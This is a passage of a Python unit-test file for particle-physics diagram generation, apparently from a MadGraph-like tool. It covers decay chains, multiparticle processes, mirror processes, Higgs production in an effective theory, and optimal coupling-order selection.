for vertex in diagram.get('vertices'):
for l in vertex.get('legs'):
self.assertTrue(l.get('onshell') and l.get('state') and \
not l.get('number') in external or \
not l.get('onshell') and (not l.get('state') or \
l.get('number') in external))
external.add(l.get('number'))
def test_unused_decays_in_decay_chain_pp_jj(self):
"""Test removal of unused decays in decay chain qq > qq, j > jj
"""
p = [1, -1, 2, -2, 21]
q = [1, -1, 2, -2]
my_multi_leg = base_objects.MultiLeg({'ids': q, 'state': True});
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * 4])
my_multi_leglist[0].set('state', False)
my_multi_leglist[1].set('state', False)
my_process_definition = base_objects.ProcessDefinition({'legs':my_multi_leglist,
'model':self.mymodel})
my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});
my_decay_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * 4])
my_decay_leglist[0].set('state', False)
my_decay_processes = base_objects.ProcessDefinition({\
'legs':my_decay_leglist,
'model':self.mymodel})
my_process_definition.set('decay_chains',
base_objects.ProcessDefinitionList(\
[my_decay_processes]))
decay_chain = diagram_generation.DecayChainAmplitude(\
my_process_definition)
# Check that all decays are quarks, no gluons
for dc_amp in decay_chain.get('decay_chains')[0].get('amplitudes'):
self.assertTrue(dc_amp.get('process').get('legs')[0].get('id') in q)
def test_forbidden_s_channel_decay_chain(self):
"""Test decay chains with forbidden s-channel particles.
"""
goal_no_quark = 6
quark_none = {0:[0,1],1:[0,1],3:[1],5:[1]}
# Test with u a > u a (+ g)
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':22,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.append(base_objects.Leg({'id':22,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'forbidden_onsh_s_channels':[1]})
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':22,
'state':True}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
mydecayproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
myproc.set('decay_chains', base_objects.ProcessList([mydecayproc]))
myamplitude = diagram_generation.DecayChainAmplitude(myproc)
#print myamplitude.nice_string()
self.assertEqual(len(myamplitude.get('amplitudes')[0].get('diagrams')),
goal_no_quark)
#print myamplitude.nice_string()
diagrams = myamplitude.get('amplitudes')[0].get('diagrams')
for idiag in range(len(diagrams)):
if idiag in quark_none:
vertices = diagrams[idiag].get('vertices')
for ivert in range(len(vertices)):
if ivert in quark_none[idiag]:
self.assertEqual(False,
vertices[ivert].get('legs')[-1].get('onshell'))
else:
self.assertEqual(None,
vertices[ivert].get('legs')[-1].get('onshell'))
else:
self.assertFalse(any([vert.get('legs')[-1].get('onshell') == False\
for vert in diagrams[idiag].get('vertices')]))
#===============================================================================
# MultiProcessTest
#===============================================================================
class MultiProcessTest(unittest.TestCase):
"""Test class for the MultiProcess object"""
mydict = {}
my_process_definition = None
mymodel = base_objects.Model()
my_multi_leglist = base_objects.MultiLegList()
my_process_definitions = base_objects.ProcessDefinitionList()
my_processes = base_objects.ProcessList()
my_multi_process = diagram_generation.MultiProcess()
def setUp(self):
mypartlist = base_objects.ParticleList()
myinterlist = base_objects.InteractionList()
# A gluon
mypartlist.append(base_objects.Particle({'name':'g',
'antiname':'g',
'spin':3,
'color':8,
'mass':'zero',
'width':'zero',
'texname':'g',
'antitexname':'g',
'line':'curly',
'charge':0.,
'pdg_code':21,
'propagating':True,
'is_part':True,
'self_antipart':True}))
# A quark U and its antiparticle
mypartlist.append(base_objects.Particle({'name':'u',
'antiname':'u~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'u',
'antitexname':'\bar u',
'line':'straight',
'charge':2. / 3.,
'pdg_code':2,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antiu = copy.copy(mypartlist[1])
antiu.set('is_part', False)
# A quark D and its antiparticle
mypartlist.append(base_objects.Particle({'name':'d',
'antiname':'d~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'d',
'antitexname':'\bar d',
'line':'straight',
'charge':-1. / 3.,
'pdg_code':1,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antid = copy.copy(mypartlist[2])
antid.set('is_part', False)
# A photon
mypartlist.append(base_objects.Particle({'name':'a',
'antiname':'a',
'spin':3,
'color':1,
'mass':'zero',
'width':'zero',
'texname':'\gamma',
'antitexname':'\gamma',
'line':'wavy',
'charge':0.,
'pdg_code':22,
'propagating':True,
'is_part':True,
'self_antipart':True}))
# A electron and positron
mypartlist.append(base_objects.Particle({'name':'e-',
'antiname':'e+',
'spin':2,
'color':1,
'mass':'zero',
'width':'zero',
'texname':'e^-',
'antitexname':'e^+',
'line':'straight',
'charge':-1.,
'pdg_code':11,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antie = copy.copy(mypartlist[4])
antie.set('is_part', False)
# 3 gluon vertiex
myinterlist.append(base_objects.Interaction({
'id': 1,
'particles': base_objects.ParticleList(\
[mypartlist[0]] * 3),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G'},
'orders':{'QCD':1}}))
# 4 gluon vertex
myinterlist.append(base_objects.Interaction({
'id': 2,
'particles': base_objects.ParticleList(\
[mypartlist[0]] * 4),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G^2'},
'orders':{'QCD':2}}))
# Gluon and photon couplings to quarks
myinterlist.append(base_objects.Interaction({
'id': 3,
'particles': base_objects.ParticleList(\
[mypartlist[1], \
antiu, \
mypartlist[0]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 4,
'particles': base_objects.ParticleList(\
[mypartlist[1], \
antiu, \
mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
myinterlist.append(base_objects.Interaction({
'id': 5,
'particles': base_objects.ParticleList(\
[mypartlist[2], \
antid, \
mypartlist[0]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 6,
'particles': base_objects.ParticleList(\
[mypartlist[2], \
antid, \
mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
# Coupling of e to gamma
myinterlist.append(base_objects.Interaction({
'id': 7,
'particles': base_objects.ParticleList(\
[mypartlist[4], \
antie, \
mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
self.mymodel.set('particles', mypartlist)
self.mymodel.set('interactions', myinterlist)
self.mymodel.set('order_hierarchy', {'QCD':1, 'QED':2})
self.my_multi_leglist = base_objects.MultiLegList(\
[copy.copy(base_objects.MultiLeg({'ids':[3, 4, 5],
'state':True})) for \
dummy in range(5)])
self.my_multi_leglist[0].set('state', False)
self.my_multi_leglist[1].set('state', False)
mydict = {'legs':self.my_multi_leglist,
'orders':{'QCD':5, 'QED':1},
'model':self.mymodel,
'id':3}
self.my_process_definition = base_objects.ProcessDefinition(mydict)
self.my_process_definitions = base_objects.ProcessDefinitionList(\
[self.my_process_definition])
self.mydict = {'process_definitions':self.my_process_definitions}
self.my_multi_process = diagram_generation.MultiProcess(\
self.mydict)
def test_setget_process_correct(self):
"Test correct MultiProcess object __init__, get and set"
myprocess2 = diagram_generation.MultiProcess()
for prop in self.mydict.keys():
myprocess2.set(prop, self.mydict[prop])
self.assertEqual(self.my_multi_process, myprocess2)
def test_setget_process_exceptions(self):
"Test error raising in MultiProcess __init__, get and set"
wrong_dict = self.mydict
wrong_dict['wrongparam'] = 'wrongvalue'
a_number = 0
# Test init
self.assertRaises(diagram_generation.MultiProcess.PhysicsObjectError,
diagram_generation.MultiProcess,
wrong_dict)
self.assertRaises(AssertionError,
diagram_generation.MultiProcess,
a_number)
# Test get
self.assertRaises(AssertionError,
self.my_multi_process.get,
a_number)
self.assertRaises(diagram_generation.MultiProcess.PhysicsObjectError,
self.my_multi_process.get,
'wrongparam')
# Test set
self.assertRaises(AssertionError,
self.my_multi_process.set,
a_number, 0)
self.assertRaises(diagram_generation.MultiProcess.PhysicsObjectError,
self.my_multi_process.set,
'wrongparam', 0)
def test_representation(self):
"""Test process object string representation."""
goal = "{\n"
goal = goal + " \'process_definitions\': %s,\n" % repr(self.my_process_definitions)
goal = goal + " \'amplitudes\': %s\n}" % repr(diagram_generation.AmplitudeList())
self.assertEqual(goal, str(self.my_multi_process))
def test_multiparticle_pp_nj(self):
"""Setting up and testing pp > nj based on multiparticle lists,
using the amplitude functionality of MultiProcess
(which makes partial use of crossing symmetries)
"""
max_fs = 2 # 3
p = [1, -1, 2, -2, 21]
my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});
goal_number_processes = [219, 379]
goal_valid_procs = []
goal_valid_procs.append([([1, 1, 1, 1], 4),
([1, -1, 1, -1], 4),
([1, -1, 2, -2], 2),
([1, -1, 21, 21], 3),
([1, 2, 1, 2], 2),
([1, -2, 1, -2], 2),
([1, 21, 1, 21], 3),
([-1, 1, 1, -1], 4),
([-1, 1, 2, -2], 2),
([-1, 1, 21, 21], 3),
([-1, -1, -1, -1], 4),
([-1, 2, -1, 2], 2),
([-1, -2, -1, -2], 2),
([-1, 21, -1, 21], 3),
([2, 1, 1, 2], 2),
([2, -1, -1, 2], 2),
([2, 2, 2, 2], 4),
([2, -2, 1, -1], 2),
([2, -2, 2, -2], 4),
([2, -2, 21, 21], 3),
([2, 21, 2, 21], 3),
([-2, 1, 1, -2], 2),
([-2, -1, -1, -2], 2),
([-2, 2, 1, -1], 2),
([-2, 2, 2, -2], 4),
([-2, 2, 21, 21], 3),
([-2, -2, -2, -2], 4),
([-2, 21, -2, 21], 3),
([21, 1, 1, 21], 3),
([21, -1, -1, 21], 3),
([21, 2, 2, 21], 3),
([21, -2, -2, 21], 3),
([21, 21, 1, -1], 3),
([21, 21, 2, -2], 3),
([21, 21, 21, 21], 4)])
goal_valid_procs.append([([1, 1, 1, 1, 21], 18),
([1, -1, 1, -1, 21], 18),
([1, -1, 2, -2, 21], 9),
([1, -1, 21, 21, 21], 16),
([1, 2, 1, 2, 21], 9),
([1, -2, 1, -2, 21], 9),
([1, 21, 1, 1, -1], 18),
([1, 21, 1, 2, -2], 9),
([1, 21, 1, 21, 21], 16),
([-1, 1, 1, -1, 21], 18),
([-1, 1, 2, -2, 21], 9),
([-1, 1, 21, 21, 21], 16),
([-1, -1, -1, -1, 21], 18),
([-1, 2, -1, 2, 21], 9),
([-1, -2, -1, -2, 21], 9),
([-1, 21, 1, -1, -1], 18),
([-1, 21, -1, 2, -2], 9),
([-1, 21, -1, 21, 21], 16),
([2, 1, 1, 2, 21], 9),
([2, -1, -1, 2, 21], 9),
([2, 2, 2, 2, 21], 18),
([2, -2, 1, -1, 21], 9),
([2, -2, 2, -2, 21], 18),
([2, -2, 21, 21, 21], 16),
([2, 21, 1, -1, 2], 9),
([2, 21, 2, 2, -2], 18),
([2, 21, 2, 21, 21], 16),
([-2, 1, 1, -2, 21], 9),
([-2, -1, -1, -2, 21], 9),
([-2, 2, 1, -1, 21], 9),
([-2, 2, 2, -2, 21], 18),
([-2, 2, 21, 21, 21], 16),
([-2, -2, -2, -2, 21], 18),
([-2, 21, 1, -1, -2], 9),
([-2, 21, 2, -2, -2], 18),
([-2, 21, -2, 21, 21], 16),
([21, 1, 1, 1, -1], 18),
([21, 1, 1, 2, -2], 9),
([21, 1, 1, 21, 21], 16),
([21, -1, 1, -1, -1], 18),
([21, -1, -1, 2, -2], 9),
([21, -1, -1, 21, 21], 16),
([21, 2, 1, -1, 2], 9),
([21, 2, 2, 2, -2], 18),
([21, 2, 2, 21, 21], 16),
([21, -2, 1, -1, -2], 9),
([21, -2, 2, -2, -2], 18),
([21, -2, -2, 21, 21], 16),
([21, 21, 1, -1, 21], 16),
([21, 21, 2, -2, 21], 16),
([21, 21, 21, 21, 21], 25)])
for nfs in range(2, max_fs + 1):
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * (2 + nfs)])
my_multi_leglist[0].set('state', False)
my_multi_leglist[1].set('state', False)
my_process_definition = base_objects.ProcessDefinition({\
'legs':my_multi_leglist,
'model':self.mymodel,
'orders': {'QED': nfs}})
my_multiprocess = diagram_generation.MultiProcess(\
{'process_definitions':\
base_objects.ProcessDefinitionList([my_process_definition])})
nproc = 0
# Calculate diagrams for all processes
amplitudes = my_multiprocess.get('amplitudes')
valid_procs = [([leg.get('id') for leg in \
amplitude.get('process').get('legs')],
len(amplitude.get('diagrams'))) \
for amplitude in amplitudes]
if nfs <= 3:
self.assertEqual(valid_procs, goal_valid_procs[nfs-2])
#print 'pp > ',nfs,'j (p,j = ', p, '):'
#print 'Valid processes: ',len(filter(lambda item: item[1] > 0, valid_procs))
#print 'Attempted processes: ',len(amplitudes)
def test_multiparticle_stop_decay(self):
"""Test that process mirroring is not used in the process st > st g
"""
mypartlist = base_objects.ParticleList()
myinterlist = base_objects.InteractionList()
mymodel = base_objects.Model()
# A gluon
mypartlist.append(base_objects.Particle({'name':'g',
'antiname':'g',
'spin':3,
'color':8,
'mass':'zero',
'width':'zero',
'texname':'g',
'antitexname':'g',
'line':'curly',
'charge':0.,
'pdg_code':21,
'propagating':True,
'is_part':True,
'self_antipart':True}))
g = mypartlist[-1]
# Two stop squarks
mypartlist.append(base_objects.Particle({'name':'t1',
'antiname':'t1~',
'spin':1,
'color':3,
'mass':'Mt1',
'width':'Wt1',
'texname':'t1',
'antitexname':'\bar t1',
'line':'straight',
'charge':2. / 3.,
'pdg_code':1000006,
'propagating':True,
'is_part':True,
'self_antipart':False}))
t1 = mypartlist[-1]
t1bar = copy.copy(t1)
t1bar.set('is_part', False)
mypartlist.append(base_objects.Particle({'name':'t2',
'antiname':'t2~',
'spin':1,
'color':3,
'mass':'Mt2',
'width':'Wt2',
'texname':'t2',
'antitexname':'\bar t2',
'line':'straight',
'charge':2. / 3.,
'pdg_code':2000006,
'propagating':True,
'is_part':True,
'self_antipart':False}))
t2 = mypartlist[-1]
t2bar = copy.copy(t2)
t2bar.set('is_part', False)
# Gluon couplings to squarks
myinterlist.append(base_objects.Interaction({
'id': 1,
'particles': base_objects.ParticleList(\
[t1bar, \
t1, \
g]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 2,
'particles': base_objects.ParticleList(\
[t2bar, \
t2, \
g]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 3,
'particles': base_objects.ParticleList(\
[t1bar, \
t2, \
g]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G12G'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 4,
'particles': base_objects.ParticleList(\
[t2bar, \
t1, \
g]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G12G'},
'orders':{'QCD':1}}))
mymodel.set('particles', mypartlist)
mymodel.set('interactions',myinterlist)
max_fs = 2
p = [1000006, 2000006, -1000006, -2000006]
my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});
goal_number_processes = [8]
goal_valid_procs = []
goal_valid_procs.append([([1000006, 1000006, 21], 1),
([1000006, 2000006, 21], 1),
([2000006, 1000006, 21], 1),
([2000006, 2000006, 21], 1),
([-1000006, -1000006, 21], 1),
([-1000006, -2000006, 21], 1),
([-2000006, -1000006, 21], 1),
([-2000006, -2000006, 21], 1)])
for nfs in range(2, max_fs + 1):
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * 2])
my_multi_leglist += [copy.copy(base_objects.MultiLeg({'ids':[21]}))\
for n in range(2, nfs + 1)]
my_multi_leglist[0].set('state', False)
my_process_definition = base_objects.ProcessDefinition({\
'legs':my_multi_leglist,
'model':mymodel,
'orders': {'QED': nfs}})
my_multiprocess = diagram_generation.MultiProcess(\
{'process_definitions':\
base_objects.ProcessDefinitionList([my_process_definition])},
collect_mirror_procs = True)
nproc = 0
# Calculate diagrams for all processes
amplitudes = my_multiprocess.get('amplitudes')
valid_procs = [([leg.get('id') for leg in \
amplitude.get('process').get('legs')],
len(amplitude.get('diagrams'))) \
for amplitude in amplitudes]
# print 'pp > ',nfs,'j (p,j = ', p, '):'
# print 'Valid processes: ',valid_procs
if nfs <= 3:
self.assertEqual(valid_procs, goal_valid_procs[nfs-2])
def test_heft_multiparticle_pp_hnj(self):
"""Test pp > h+nj in HEFT, which tests new optimize_orders
"""
mypartlist = base_objects.ParticleList()
myinterlist = base_objects.InteractionList()
# A gluon
mypartlist.append(base_objects.Particle({'name':'g',
'antiname':'g',
'spin':3,
'color':8,
'mass':'zero',
'width':'zero',
'texname':'g',
'antitexname':'g',
'line':'curly',
'charge':0.,
'pdg_code':21,
'propagating':True,
'is_part':True,
'self_antipart':True}))
g = mypartlist[-1]
# A quark U and its antiparticle
mypartlist.append(base_objects.Particle({'name':'u',
'antiname':'u~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'u',
'antitexname':'\bar u',
'line':'straight',
'charge':2. / 3.,
'pdg_code':2,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antiu = copy.copy(mypartlist[1])
antiu.set('is_part', False)
# A quark D and its antiparticle
mypartlist.append(base_objects.Particle({'name':'d',
'antiname':'d~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'d',
'antitexname':'\bar d',
'line':'straight',
'charge':-1. / 3.,
'pdg_code':1,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antid = copy.copy(mypartlist[2])
antid.set('is_part', False)
# A photon
mypartlist.append(base_objects.Particle({'name':'a',
'antiname':'a',
'spin':3,
'color':1,
'mass':'zero',
'width':'zero',
'texname':'\gamma',
'antitexname':'\gamma',
'line':'wavy',
'charge':0.,
'pdg_code':22,
'propagating':True,
'is_part':True,
'self_antipart':True}))
# A higgs
mypartlist.append(base_objects.Particle({'name':'h',
'antiname':'h',
'spin':1,
'color':1,
'mass':'MH',
'width':'WH',
'texname':'h',
'antitexname':'h',
'line':'dashed',
'charge':0.,
'pdg_code':25,
'propagating':True,
'is_part':True,
'self_antipart':True}))
h = mypartlist[-1]
# 3 gluon vertiex
myinterlist.append(base_objects.Interaction({
'id': 1,
'particles': base_objects.ParticleList(\
[mypartlist[0]] * 3),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G'},
'orders':{'QCD':1}}))
# 4 gluon vertex
myinterlist.append(base_objects.Interaction({
'id': 2,
'particles': base_objects.ParticleList(\
[mypartlist[0]] * 4),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G^2'},
'orders':{'QCD':2}}))
# Gluon and photon couplings to quarks
myinterlist.append(base_objects.Interaction({
'id': 3,
'particles': base_objects.ParticleList(\
[mypartlist[1], \
antiu, \
mypartlist[0]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 4,
'particles': base_objects.ParticleList(\
[mypartlist[1], \
antiu, \
mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
myinterlist.append(base_objects.Interaction({
'id': 5,
'particles': base_objects.ParticleList(\
[mypartlist[2], \
antid, \
mypartlist[0]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 6,
'particles': base_objects.ParticleList(\
[mypartlist[2], \
antid, \
mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
# Couplings of h to g
myinterlist.append(base_objects.Interaction({
'id': 7,
'particles': base_objects.ParticleList(\
[g,
g, \
h]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GGH'},
'orders':{'HIG':1}}))
myinterlist.append(base_objects.Interaction({
'id': 8,
'particles': base_objects.ParticleList(\
[g,
g,
g,
h]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GGGH'},
'orders':{'HIG':1, 'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 9,
'particles': base_objects.ParticleList(\
[g,
g,
g,
g,
h]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GGGGH'},
'orders':{'HIG':1, 'QCD':2}}))
mymodel = base_objects.Model()
mymodel.set('particles', mypartlist)
mymodel.set('interactions', myinterlist)
mymodel.set('order_hierarchy', {'QCD':1, 'HIG':1, 'QED':2})
mymodel.set('expansion_order', {'QCD':-1, 'HIG':1, 'QED':-1})
max_fs = 2
p = [21, 1, 2, -1, -2]
my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});
goal_number_processes = [7, 21]
goal_valid_procs = [[([21, 21, 21, 25], 4),
([21, 1, 1, 25], 1),
([21, 2, 2, 25], 1),
([21, -1, -1, 25], 1),
([21, -2, -2, 25], 1),
([1, -1, 21, 25], 1),
([2, -2, 21, 25], 1)],
[([21, 21, 21, 21, 25], 26),
([21, 21, 1, -1, 25], 8),
([21, 21, 2, -2, 25], 8),
([21, 1, 21, 1, 25], 8),
([21, 2, 21, 2, 25], 8),
([21, -1, 21, -1, 25], 8),
([21, -2, 21, -2, 25], 8),
([1, 1, 1, 1, 25], 2),
([1, 2, 1, 2, 25], 1),
([1, -1, 21, 21, 25], 8),
([1, -1, 1, -1, 25], 2),
([1, -1, 2, -2, 25], 1),
([1, -2, 1, -2, 25], 1),
([2, 2, 2, 2, 25], 2),
([2, -1, 2, -1, 25], 1),
([2, -2, 21, 21, 25], 8),
([2, -2, 1, -1, 25], 1),
([2, -2, 2, -2, 25], 2),
([-1, -1, -1, -1, 25], 2),
([-1, -2, -1, -2, 25], 1),
([-2, -2, -2, -2, 25], 2)]]
for nfs in range(1, max_fs + 1):
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * (2 + nfs)])
my_multi_leglist.append(base_objects.MultiLeg({'ids': [25]}))
my_multi_leglist[0].set('state', False)
my_multi_leglist[1].set('state', False)
my_process_definition = base_objects.ProcessDefinition({\
'legs':my_multi_leglist,
'model':mymodel})
my_multiprocess = diagram_generation.MultiProcess(\
my_process_definition, collect_mirror_procs = True)
nproc = 0
# Calculate diagrams for all processes
amplitudes = my_multiprocess.get('amplitudes')
valid_procs = [([leg.get('id') for leg in \
amplitude.get('process').get('legs')],
len(amplitude.get('diagrams'))) \
for amplitude in amplitudes]
if nfs <= 3:
self.assertEqual(valid_procs, goal_valid_procs[nfs-1])
#print 'pp > h + ',nfs,'j (p,j = ', p, '):'
#print 'Processes: ',len(amplitudes), \
# ' with ', sum([v[1] for v in valid_procs]),
#for amplitude in amplitudes:
# print amplitude.get('process').nice_string()
#print 'valid_procs = ',valid_procs
def test_multiparticle_mirror_pp_3j(self):
"""Setting up and testing pp > 3j mirror process functionality
"""
max_fs = 3
p = [21, 1, 2, -1, -2]
my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});
goal_number_processes = 29
goal_legs_mirror = [\
([21, 21, 21, 21, 21], False),
([21, 21, 21, 1, -1], False),
([21, 21, 21, 2, -2], False),
([21, 1, 21, 21, 1], True),
([21, 1, 1, 1, -1], True),
([21, 1, 1, 2, -2], True),
([21, 2, 21, 21, 2], True),
([21, 2, 1, 2, -1], True),
([21, 2, 2, 2, -2], True),
([21, -1, 21, 21, -1], True),
([21, -1, 1, -1, -1], True),
([21, -1, 2, -1, -2], True),
([21, -2, 21, 21, -2], True),
([21, -2, 1, -1, -2], True),
([21, -2, 2, -2, -2], True),
([1, 1, 21, 1, 1], False),
([1, 2, 21, 1, 2], True),
([1, -1, 21, 21, 21], True),
([1, -1, 21, 1, -1], True),
([1, -1, 21, 2, -2], True),
([1, -2, 21, 1, -2], True),
([2, 2, 21, 2, 2], False),
([2, -1, 21, 2, -1], True),
([2, -2, 21, 21, 21], True),
([2, -2, 21, 1, -1], True),
([2, -2, 21, 2, -2], True),
([-1, -1, 21, -1, -1], False),
([-1, -2, 21, -1, -2], True),
([-2, -2, 21, -2, -2], False)]
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * 5])
my_multi_leglist[0].set('state', False)
my_multi_leglist[1].set('state', False)
my_process_definition = base_objects.ProcessDefinition({\
'legs':my_multi_leglist,
'model':self.mymodel,
'orders': {'QED': 0}})
# Calculate diagrams for all processes
myproc = diagram_generation.MultiProcess(my_process_definition,
collect_mirror_procs = True)
amplitudes = myproc.get('amplitudes')
legs_mirror = [([l.get('id') for l in a.get('process').get('legs')],
a.get('has_mirror_process')) for a in amplitudes]
self.assertEqual(legs_mirror, goal_legs_mirror)
def test_find_optimal_order(self):
"""Test find_optimal_process_orders for different configurations
"""
# First try p p > e+ e- + nj
max_fs = 5
p = [21, 1, -1, 2, -2]
my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});
orders = [4, 5, 6, 7, 8]
for nfs in range(2, max_fs + 1):
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * (nfs)])
my_multi_leglist[0].set('state', False)
my_multi_leglist[1].set('state', False)
my_multi_leglist.append(base_objects.MultiLeg({'ids': [11],
'state': True}))
my_multi_leglist.append(base_objects.MultiLeg({'ids': [-11],
'state': True}))
my_process_definition = base_objects.ProcessDefinition({'legs':my_multi_leglist,
'model':self.mymodel})
# Check coupling orders for process
self.assertEqual(diagram_generation.MultiProcess.\
find_optimal_process_orders(my_process_definition),
{'WEIGHTED': orders[nfs-2]})
# Now check p p > a > p p
max_fs = 3
orders = [4, 5]
for nfs in range(2, max_fs + 1):
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for \
leg in [my_multi_leg] * (2+nfs)])
my_multi_leglist[0].set('state', False)
my_multi_leglist[1].set('state', False)
my_process_definition = base_objects.ProcessDefinition({\
'legs':my_multi_leglist,
'model':self.mymodel,
'required_s_channels':[22]})
self.assertEqual(diagram_generation.MultiProcess.\
find_optimal_process_orders(my_process_definition),
{'WEIGHTED': orders[nfs-2]})
# Now check p p > a|g > p p
max_fs = 3
orders = [2, 3]
for nfs in range(2, max_fs + 1):
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for \
leg in [my_multi_leg] * (2+nfs)])
my_multi_leglist[0].set('state', False)
my_multi_leglist[1].set('state', False)
my_process_definition = base_objects.ProcessDefinition({\
'legs':my_multi_leglist,
'model':self.mymodel,
'required_s_channels':[[22],[21]]})
self.assertEqual(diagram_generation.MultiProcess.\
find_optimal_process_orders(my_process_definition),
{'WEIGHTED': orders[nfs-2]})
# Check that it works with multiple non-QCD orders.
myoldinterlist = self.mymodel.get('interactions')
myinterlist = copy.copy(myoldinterlist)
myinterlist.append(base_objects.Interaction({
'id': 8,
'particles': base_objects.ParticleList(\
[]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'SQED':1}}))
self.mymodel.set('interactions', myinterlist)
self.mymodel.set('order_hierarchy', {'QCD':1, 'QED':2, 'SQED':2})
self.assertEqual(diagram_generation.MultiProcess.\
find_optimal_process_orders(my_process_definition),
{'WEIGHTED': orders[nfs-2]})
self.mymodel.set('interactions', myoldinterlist)
# Now check decay process p > p (a|g)
max_fs = 3
orders = [1, 2]
ag = [21, 22]
my_ag_leg = base_objects.MultiLeg({'ids': ag, 'state': True});
for nfs in range(2, max_fs + 1):
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for \
leg in [my_multi_leg] * 2])
my_multi_leglist.extend([copy.copy(leg) for \
leg in [my_ag_leg] * (nfs-1)])
my_multi_leglist[0].set('state', False)
my_process_definition = base_objects.ProcessDefinition({\
'legs':my_multi_leglist,
'model':self.mymodel})
self.assertEqual(diagram_generation.MultiProcess.\
find_optimal_process_orders(my_process_definition),
{})
my_process_definition.set('is_decay_chain', True)
self.assertEqual(diagram_generation.MultiProcess.\
find_optimal_process_orders(my_process_definition),
{'WEIGHTED': orders[nfs-2]})
def test_multiparticle_pp_nj_with_required_s_channel(self):
"""Setting up and testing pp > nj with required photon s-channel
"""
max_fs = 2 # 3
p = [1, -1, 2, -2, 21]
my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});
goal_number_processes = [8, 24]
goal_valid_procs = []
goal_valid_procs.append([([1, -1, 1, -1], 1),
([1, -1, 2, -2], 1),
([-1, 1, 1, -1], 1),
([-1, 1, 2, -2], 1),
([2, -2, 1, -1], 1),
([2, -2, 2, -2], 1),
([-2, 2, 1, -1], 1),
([-2, 2, 2, -2], 1)])
goal_valid_procs.append([([1, -1, 1, -1, 21], 4),
([1, -1, 2, -2, 21], 4),
([1, 21, 1, 1, -1], 4),
([1, 21, 1, 2, -2], 2),
([-1, 1, 1, -1, 21], 4),
([-1, 1, 2, -2, 21], 4),
([-1, 21, 1, -1, -1], 4),
([-1, 21, -1, 2, -2], 2),
([2, -2, 1, -1, 21], 4),
([2, -2, 2, -2, 21], 4),
([2, 21, 1, -1, 2], 2),
([2, 21, 2, 2, -2], 4),
